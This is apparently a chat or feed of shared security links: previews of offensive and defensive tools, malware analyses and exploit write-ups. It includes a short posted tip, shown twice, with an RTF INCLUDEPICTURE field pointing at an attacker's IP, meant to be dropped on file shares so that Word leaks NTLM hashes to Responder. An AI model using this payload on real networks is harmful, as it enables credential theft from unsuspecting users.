GitHub - root-tanishq/userefuzz: User-Agent , X-Forwarded-For and Referer SQLI Fuzzer
https://github.com/root-tanishq/userefuzz
https://github.com/root-tanishq/userefuzz
GitHub
GitHub - root-tanishq/userefuzz: User-Agent , X-Forwarded-For and Referer SQLI Fuzzer
User-Agent , X-Forwarded-For and Referer SQLI Fuzzer - root-tanishq/userefuzz
Sneaky long-term op tech: drop a Word doc with the following embedded "image" on shares:
'{\\rtf1{\\field{\\*\\fldinst {INCLUDEPICTURE "file://<kail ip>/a.jpg" \\\\* MERGEFORMAT\\\\d}}{\\fldrslt}}}'
Word auto-includes imgs from UNC paths; with Responder, catch hashes.
'{\\rtf1{\\field{\\*\\fldinst {INCLUDEPICTURE "file://<kail ip>/a.jpg" \\\\* MERGEFORMAT\\\\d}}{\\fldrslt}}}'
Word auto-includes imgs from UNC paths; with Responder, catch hashes.
GitHub - optiv/Freeze: Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
https://github.com/optiv/Freeze
https://github.com/optiv/Freeze
GitHub
GitHub - optiv/Freeze: Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative…
Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods - optiv/Freeze
GitHub - iperov/DeepFaceLive: Real-time face swap for PC streaming or video calls
https://github.com/iperov/DeepFaceLive
https://github.com/iperov/DeepFaceLive
GitHub
GitHub - iperov/DeepFaceLive: Real-time face swap for PC streaming or video calls
Real-time face swap for PC streaming or video calls - iperov/DeepFaceLive
GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
https://github.com/Greenwolf/ntlm_theft
https://github.com/Greenwolf/ntlm_theft
GitHub
GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf) - Greenwolf/ntlm_theft
GitHub - last-byte/PersistenceSniper: Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper
https://github.com/last-byte/PersistenceSniper
GitHub
GitHub - last-byte/PersistenceSniper: Powershell module that can be used by Blue Teams, Incident Responders and System Administrators…
Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. Official Twitter/X account @PersistSniper. Made w...
Snakes on a Domain: An Analysis of a Python Malware Loader
https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader
https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader
Huntress
Snakes on a Domain: An Analysis of a Python Malware Loader | Huntress
Join us on a threat analysis journey as we discover a very shady Python—and a very friendly RAT.
Pwning ManageEngine — From Endpoint to Exploit | by Erik Wynter | Oct, 2022 | Medium
https://medium.com/@erik.wynter/pwning-manageengine-from-endpoint-to-exploit-bc5793836fd
https://medium.com/@erik.wynter/pwning-manageengine-from-endpoint-to-exploit-bc5793836fd
Medium
Pwning ManageEngine — From Endpoint to Exploit
A deep dive into CVE-2021–42847
GitHub - cisagov/RedEye: RedEye is a visual analytic tool supporting Red & Blue Team operations
https://github.com/cisagov/RedEye/
https://github.com/cisagov/RedEye/
GitHub
GitHub - cisagov/RedEye: RedEye is a visual analytic tool supporting Red & Blue Team operations
RedEye is a visual analytic tool supporting Red & Blue Team operations - cisagov/RedEye
Practical Attacks against NTLMv1 - TrustedSec
https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/
https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/
TrustedSec
Practical Attacks against NTLMv1
Two different attack methods will be covered: Authentication Downgrade -> Cracking LDAP Relay -> Resource Based Constrained Delegation (RBCD) / Shadow…
Hardware Trojans Under a Microscope | by Ryan Cornateanu | Oct, 2022 | Medium
https://ryancor.medium.com/hardware-trojans-under-a-microscope-bf542acbcc29
https://ryancor.medium.com/hardware-trojans-under-a-microscope-bf542acbcc29
Medium
Hardware Trojans Under a Microscope
Table of Contents
GitHub - VirtualAlllocEx/Payload-Download-Cradles: This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.
https://github.com/VirtualAlllocEx/Payload-Download-Cradles
https://github.com/VirtualAlllocEx/Payload-Download-Cradles
GitHub
GitHub - VirtualAlllocEx/Payload-Download-Cradles: This are different types of download cradles which should be an inspiration…
This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections. - VirtualAlllocEx/...